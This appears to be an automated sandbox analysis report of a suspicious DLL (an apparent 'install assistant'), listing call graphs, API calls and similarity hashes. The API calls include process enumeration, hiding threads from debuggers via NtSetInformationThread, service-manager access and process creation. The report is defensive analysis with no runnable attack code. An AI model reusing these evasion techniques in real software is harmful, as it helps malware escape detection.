std::_Facet_Register 4 API calls 101151->101152 101152->101157 101153->101157 101154 6c619bbd GetCurrentProcess TerminateProcess 101154->101147 101155 6c6263b2 101225 6c6015e0 18 API calls std::ios_base::_Ios_base_dtor 101155->101225 101157->101155 101159 6c616970 101157->101159 101160 6c616989 101157->101160 101163 6c616920 _Yarn 101157->101163 101158 6c6264f8 101161 6c786a43 std::_Facet_Register 4 API calls 101159->101161 101162 6c786a43 std::_Facet_Register 4 API calls 101160->101162 101161->101163 101162->101163 101164 6c785960 104 API calls 101163->101164 101167 6c6169d6 std::ios_base::_Ios_base_dtor _strlen 101164->101167 101165 6c61f243 CreateFileA 101182 6c61f2a7 101165->101182 101166->101165 101167->101135 101168 6c616dd2 101167->101168 101169 6c616dbb 101167->101169 101178 6c616d69 _Yarn _strlen 101167->101178 101172 6c786a43 std::_Facet_Register 4 API calls 101168->101172 101171 6c786a43 std::_Facet_Register 4 API calls 101169->101171 101170 6c6202ca 101171->101178 101172->101178 101173 6c785960 104 API calls 101173->101188 101174 6c617440 101177 6c786a43 std::_Facet_Register 4 API calls 101174->101177 101175 6c617427 101176 6c786a43 std::_Facet_Register 4 API calls 101175->101176 101179 6c6173da _Yarn 101176->101179 101177->101179 101178->101155 101178->101174 101178->101175 101178->101179 101180 6c785960 104 API calls 101179->101180 101183 6c61748d std::ios_base::_Ios_base_dtor _strlen 101180->101183 101181 6c6202ac GetCurrentProcess TerminateProcess 101181->101170 101182->101170 101182->101181 101183->101135 101184 6c617991 101183->101184 101185 6c6179a8 101183->101185 101193 6c617940 _Yarn _strlen 101183->101193 101186 6c786a43 std::_Facet_Register 4 API calls 101184->101186 101187 6c786a43 std::_Facet_Register 4 API calls 101185->101187 101186->101193 101187->101193 101188->101135 101188->101147 101188->101154 101188->101155 101188->101173 101220 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection 
std::_Facet_Register 101188->101220 101223 6c784ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 101188->101223 101189 6c617de2 101192 6c786a43 std::_Facet_Register 4 API calls 101189->101192 101190 6c617dc9 101191 6c786a43 std::_Facet_Register 4 API calls 101190->101191 101194 6c617d7c _Yarn 101191->101194 101192->101194 101193->101155 101193->101189 101193->101190 101193->101194 101195 6c785960 104 API calls 101194->101195 101196 6c617e2f std::ios_base::_Ios_base_dtor _strlen 101195->101196 101196->101135 101197 6c6185a8 101196->101197 101198 6c6185bf 101196->101198 101206 6c618556 _Yarn _strlen 101196->101206 101199 6c786a43 std::_Facet_Register 4 API calls 101197->101199 101200 6c786a43 std::_Facet_Register 4 API calls 101198->101200 101199->101206 101200->101206 101201 6c618983 101204 6c786a43 std::_Facet_Register 4 API calls 101201->101204 101202 6c61896a 101203 6c786a43 std::_Facet_Register 4 API calls 101202->101203 101205 6c61891d _Yarn 101203->101205 101204->101205 101207 6c785960 104 API calls 101205->101207 101206->101155 101206->101201 101206->101202 101206->101205 101208 6c6189d0 std::ios_base::_Ios_base_dtor _strlen 101207->101208 101208->101135 101209 6c618f36 101208->101209 101210 6c618f1f 101208->101210 101213 6c618ecd _Yarn _strlen 101208->101213 101212 6c786a43 std::_Facet_Register 4 API calls 101209->101212 101211 6c786a43 std::_Facet_Register 4 API calls 101210->101211 101211->101213 101212->101213 101213->101155 101214 6c619354 101213->101214 101215 6c61936d 101213->101215 101218 6c619307 _Yarn 101213->101218 101216 6c786a43 std::_Facet_Register 4 API calls 101214->101216 101217 6c786a43 std::_Facet_Register 4 API calls 101215->101217 101216->101218 101217->101218 101219 6c785960 104 API calls 101218->101219 101222 6c6193ba std::ios_base::_Ios_base_dtor 101219->101222 101220->101188 101221 6c784ff0 4 API calls 101221->101147 101222->101135 101222->101221 101223->101188 101225->101158 101226 6c78ef3f 101227 6c78ef4b __wsopen_s 
101226->101227 101228 6c78ef5f 101227->101228 101229 6c78ef52 GetLastError ExitThread 101227->101229 101230 6c7949b2 __Getctype 37 API calls 101228->101230 101231 6c78ef64 101230->101231 101238 6c799d66 101231->101238 101234 6c78ef7b 101244 6c78eeaa 16 API calls 2 library calls 101234->101244 101237 6c78ef9d 101239 6c799d78 GetPEB 101238->101239 101240 6c78ef6f 101238->101240 101239->101240 101241 6c799d8b 101239->101241 101240->101234 101243 6c796d6f 5 API calls std::_Lockit::_Lockit 101240->101243 101245 6c796e18 5 API calls std::_Lockit::_Lockit 101241->101245 101243->101234 101244->101237 101245->101240 101246 6c79cad3 101247 6c79cae5 __dosmaperr 101246->101247 101248 6c79cafd 101246->101248 101248->101247 101250 6c79cb48 __dosmaperr 101248->101250 101251 6c79cb77 101248->101251 101288 6c790120 18 API calls __Getctype 101250->101288 101252 6c79cb90 101251->101252 101253 6c79cbe7 __wsopen_s 101251->101253 101254 6c79cbab __dosmaperr 101251->101254 101252->101254 101273 6c79cb95 101252->101273 101282 6c7947bb HeapFree GetLastError __dosmaperr 101253->101282 101281 6c790120 18 API calls __Getctype 101254->101281 101255 6c7a19e5 __wsopen_s 18 API calls 101257 6c79cd3e 101255->101257 101260 6c79cdb4 101257->101260 101263 6c79cd57 GetConsoleMode 101257->101263 101258 6c79cc07 101283 6c7947bb HeapFree GetLastError __dosmaperr 101258->101283 101262 6c79cdb8 ReadFile 101260->101262 101265 6c79ce2c GetLastError 101262->101265 101266 6c79cdd2 101262->101266 101263->101260 101267 6c79cd68 101263->101267 101264 6c79cc0e 101276 6c79cbc2 __dosmaperr __wsopen_s 101264->101276 101284 6c79ac69 20 API calls __wsopen_s 101264->101284 101265->101276 101266->101265 101271 6c79cda9 101266->101271 101267->101262 101268 6c79cd6e ReadConsoleW 101267->101268 101268->101271 101272 6c79cd8a GetLastError 101268->101272 101274 6c79ce0e 101271->101274 101275 6c79cdf7 101271->101275 101271->101276 101272->101276 101273->101255 101274->101276 101277 6c79ce25 101274->101277 101286 6c79cefe 23 
API calls 3 library calls 101275->101286 101285 6c7947bb HeapFree GetLastError __dosmaperr 101276->101285 101287 6c79d1b6 21 API calls __wsopen_s 101277->101287 101280 6c79ce2a 101280->101276 101281->101276 101282->101258 101283->101264 101284->101273 101285->101247 101286->101276 101287->101280 101288->101247
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
• Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: _strlen
• String ID: HR^
• API String ID: 4218353326-1341859651
• Opcode ID: dadaa5eee5a6392d00d19c5dbb34582a124f45bc14799481f527a4ff7ac1e2a3
• Instruction ID: 79ee3095d9fe505e0b9dfbf07546e9e7332cafb1a54861629afe3419e74ac189
• Opcode Fuzzy Hash: dadaa5eee5a6392d00d19c5dbb34582a124f45bc14799481f527a4ff7ac1e2a3
• Instruction Fuzzy Hash: DE741571744B028FC728CF28C9D06D5B7F3EF95318B198A2DC0A68BA55EB74B54ACB44
Strings
Memory Dump Source
• Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
• Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID:
• String ID: }jk$;T55$L@^
• API String ID: 0-4218709813
• Opcode ID: 8e09a7e5c3d64daa977af8ea23a76111949cfe5b303b50a0b87e9218a89ed394
• Instruction ID: e92e9d3d0524d6b59faddd332ccb77c11f8609b6bbc71985c20bc8f34c8c1e5a
• Opcode Fuzzy Hash: 8e09a7e5c3d64daa977af8ea23a76111949cfe5b303b50a0b87e9218a89ed394
• Instruction Fuzzy Hash: AD3417716497018FC728CF2CC8D0A96B7E3EF85319B198A2DC0968BF55EB74B54ACB40

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 7677 6c785240-6c785275 CreateToolhelp32Snapshot 7678 6c7852a0-6c7852a9 7677->7678 7679 6c7852ab-6c7852b0 7678->7679 7680 6c7852e0-6c7852e5 7678->7680 7681 6c7852b2-6c7852b7 7679->7681 7682 6c785315-6c78531a 7679->7682 7683 6c7852eb-6c7852f0 7680->7683 7684 6c785377-6c7853a1 call 6c792c05 7680->7684 7686 6c7852b9-6c7852be 7681->7686 7687 6c785334-6c78535d call 6c78b920 Process32FirstW 7681->7687 7690 6c785320-6c785332 Process32NextW 7682->7690 7691 6c7853a6-6c7853ab 7682->7691 7688 6c7852f2-6c7852f7 7683->7688 7689 6c785277-6c785292 CloseHandle 7683->7689 7684->7678 7686->7678 7693 6c7852c0-6c7852d1 7686->7693 7695 6c785362-6c785372 7687->7697 7688->7678 7695 6c7852f9-6c785313 7688->7695 7689->7678 7690->7697 7691->7678 7694 6c7853b1-6c7853bf 7691->7694 7693->7678 7695->7678 7697->7678
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C78524E
Memory Dump Source
• Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
• Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: CreateSnapshotToolhelp32
• String ID:
• API String ID: 3332741929-0
• Opcode ID: 78043f46dee295e9f8a51bc2dab952d7dcea63dfc07fc368934777b445bbfed2
• Instruction ID: 241e94b49ca30628cbbbb26027cd3873d608736889f9e4041a874be9ce0481a1
• Opcode Fuzzy Hash: 78043f46dee295e9f8a51bc2dab952d7dcea63dfc07fc368934777b445bbfed2
• Instruction Fuzzy Hash: FB31BFB520A3009FE7519F29D988B0ABBF4AF86368F50493DF689C7760D770D8488B53

Control-flow Graph

• Executed
• Not Executed
                                            [Control-flow graph image not reproduced; basic blocks 6c60383b-6c60414b, with calls to 6c751470, 6c751480, 6c603750, GetCurrentThread and NtSetInformationThread]
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13608bcf477aea8c36055a58bcb3bc999dafa6c928e94e0494b923821b975bae
                                            • Instruction ID: 6d56475149d0ae0f8718cb4ce783870db33c490aaccc2570ec1934dd9835cafb
                                            • Opcode Fuzzy Hash: 13608bcf477aea8c36055a58bcb3bc999dafa6c928e94e0494b923821b975bae
                                            • Instruction Fuzzy Hash: BB322732345B018FC328CF28C9D0A95B7E3EFD13157698A6DC0EA6BA95D774B44ACB44

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            [Control-flow graph image not reproduced; basic blocks 6c60383b-6c60414b, with calls to 6c751470, 6c751480, 6c603750, GetCurrentThread and NtSetInformationThread]
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d044d818ad80b820733abd2c63e51f512ac6d70703b1245aa5fc8a84b136f0c5
                                            • Instruction ID: caccc8c953dd10fd333327bde42d7322f2443279a14088d1bb86725dda75541e
                                            • Opcode Fuzzy Hash: d044d818ad80b820733abd2c63e51f512ac6d70703b1245aa5fc8a84b136f0c5
                                            • Instruction Fuzzy Hash: EF51F2312047018FC3248F28C580BD5B7E3BF95315F698B6DC0E66BA95DBB4B406CB44
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: a1754538de99a4390266794621f88e1c0d7e171088d1415207cc6dd92c4d65a1
                                            • Instruction ID: 4f8ba17dcb44cade12147348df2269c68934f0a47907f3f5055825c9adda27d8
                                            • Opcode Fuzzy Hash: a1754538de99a4390266794621f88e1c0d7e171088d1415207cc6dd92c4d65a1
                                            • Instruction Fuzzy Hash: C551D331204B018BC328CF28C580BD5B7E3BF96315F658B6DC0E66BA95DBB0B446CB95
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: f6a88645d3c9c7a40c8e8d43073f3dc3f257478d655dc302e619c99ce67df282
                                            • Instruction ID: 39325cb9b415100167be634cf5e125249a080cf71c5a3b4455f56e0517995c49
                                            • Opcode Fuzzy Hash: f6a88645d3c9c7a40c8e8d43073f3dc3f257478d655dc302e619c99ce67df282
                                            • Instruction Fuzzy Hash: E6314631205B01CFC338CF24C994BD6B7A3AF96309F194B2DC0A66BA81DBB47009CB55
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: 62157c9e6d061b35c6c091b8b729a0ae48f88723493d45b2196148b8f9ba11cb
                                            • Instruction ID: eddac1c7c5ca71462568bc946e8b8f273f60477df60d0d6e789a91e7775577c2
                                            • Opcode Fuzzy Hash: 62157c9e6d061b35c6c091b8b729a0ae48f88723493d45b2196148b8f9ba11cb
                                            • Instruction Fuzzy Hash: C9312331204701CFC338CF28C694BE6B7A6AF96309F254E6DC0E66BA81DBB17405CB95
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: 41a3ebe574b015032a7856597d1bf7d848472e2f6c37490305ab2f7489c94300
                                            • Instruction ID: 958128df2ca25aa915c63f260861986893f2a5b9a7b335e588ce498a26882587
                                            • Opcode Fuzzy Hash: 41a3ebe574b015032a7856597d1bf7d848472e2f6c37490305ab2f7489c94300
                                            • Instruction Fuzzy Hash: 0921F731318701CBD33CCF24C994BEA77B6AF9630AF544A2DC0A667AD1DBB4A405CB55
                                            APIs
                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C785130
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ManagerOpen
                                            • String ID:
                                            • API String ID: 1889721586-0
                                            • Opcode ID: c8fc9ea9e6706fe2fbb9cf8e318e177ec79a6e901a55fb256ecc490e02129461
                                            • Instruction ID: 9f8223a11502d5afb988ac297a22271118340bec8ba0614bbc11d1f1528092e5
                                            • Opcode Fuzzy Hash: c8fc9ea9e6706fe2fbb9cf8e318e177ec79a6e901a55fb256ecc490e02129461
                                            • Instruction Fuzzy Hash: 673118B4A0A341EFD750CF28D644A0ABBF0EBCA758F50896AF989C6360C371C945DB53
                                            APIs
                                            • FindFirstFileA.KERNEL32(?,?), ref: 6C77AEDC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 21fd5c4f60f58c338e2d9ea63c78c6de41a55b18c70174bd6b0690260a20338c
                                            • Instruction ID: 8253a202091c21c46261338b0dd71ac8a2efd2ca45e1548288ae3a89f355e708
                                            • Opcode Fuzzy Hash: 21fd5c4f60f58c338e2d9ea63c78c6de41a55b18c70174bd6b0690260a20338c
                                            • Instruction Fuzzy Hash: 48113AB45093549FEB208B28DA4450E7BE4BF86328F149E69F4A8CB691D330CC448B62
                                            APIs
                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C75ABA7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                            • API String ID: 2738559852-1563143607
                                            • Opcode ID: d4810adba33e5b89d1e7475db26e18ee03f3daad4adef061b12737f072b6ed3d
                                            • Instruction ID: 9adfeb60cfc0a51471bd66a3491dc7b6fcac40ecfa318c6800da3458fe340259
                                            • Opcode Fuzzy Hash: d4810adba33e5b89d1e7475db26e18ee03f3daad4adef061b12737f072b6ed3d
                                            • Instruction Fuzzy Hash: A8626A70A0D3818FC724CF18C590A6ABBF2AFC9314F548D2EE599CB750DB35E8558B92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            [Control-flow graph image not reproduced; basic blocks 6c79cad3-6c79ce82, with calls to internal helpers (6c78f9df, 6c78f9cc, 6c78f9f2, 6c790120, 6c7947f5, 6c7947bb, 6c79ac69, 6c7a19e5, 6c79cefe, 6c79ce83, 6c79d1b6) and to GetConsoleMode, ReadFile, ReadConsoleW and GetLastError]
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8Q
                                            • API String ID: 0-4022487301
                                            • Opcode ID: c5124c0be6e7f06ffb2c80af09e6c89ec53c6b3637f787e200738f19ee1eda9d
                                            • Instruction ID: ff13307ddeda65c3831f32342b477c545ff4bc936d308c676fa5ea23e36f73ac
                                            • Opcode Fuzzy Hash: c5124c0be6e7f06ffb2c80af09e6c89ec53c6b3637f787e200738f19ee1eda9d
                                            • Instruction Fuzzy Hash: C6C11770E05249AFEF01DFACDA89BADBFB4AF0B319F104169E511A7B91C7709905CB60

                                             Control-flow Graph
                                             • Interactive graph not recoverable from the text extraction: function starting at 6c7a406c; Win32 calls shown on the graph: GetFileType, GetLastError, CloseHandle
                                            APIs
                                              • Part of subcall function 6C7A4457: CreateFileW.KERNEL32(00000000,00000000,?,6C7A4115,?,?,00000000,?,6C7A4115,00000000,0000000C), ref: 6C7A4474
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A4180
                                            • __dosmaperr.LIBCMT ref: 6C7A4187
                                            • GetFileType.KERNEL32(00000000), ref: 6C7A4193
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A419D
                                            • __dosmaperr.LIBCMT ref: 6C7A41A6
                                            • CloseHandle.KERNEL32(00000000), ref: 6C7A41C6
                                            • CloseHandle.KERNEL32(6C79B0D0), ref: 6C7A4313
                                            • GetLastError.KERNEL32 ref: 6C7A4345
                                            • __dosmaperr.LIBCMT ref: 6C7A434C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                             • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmp
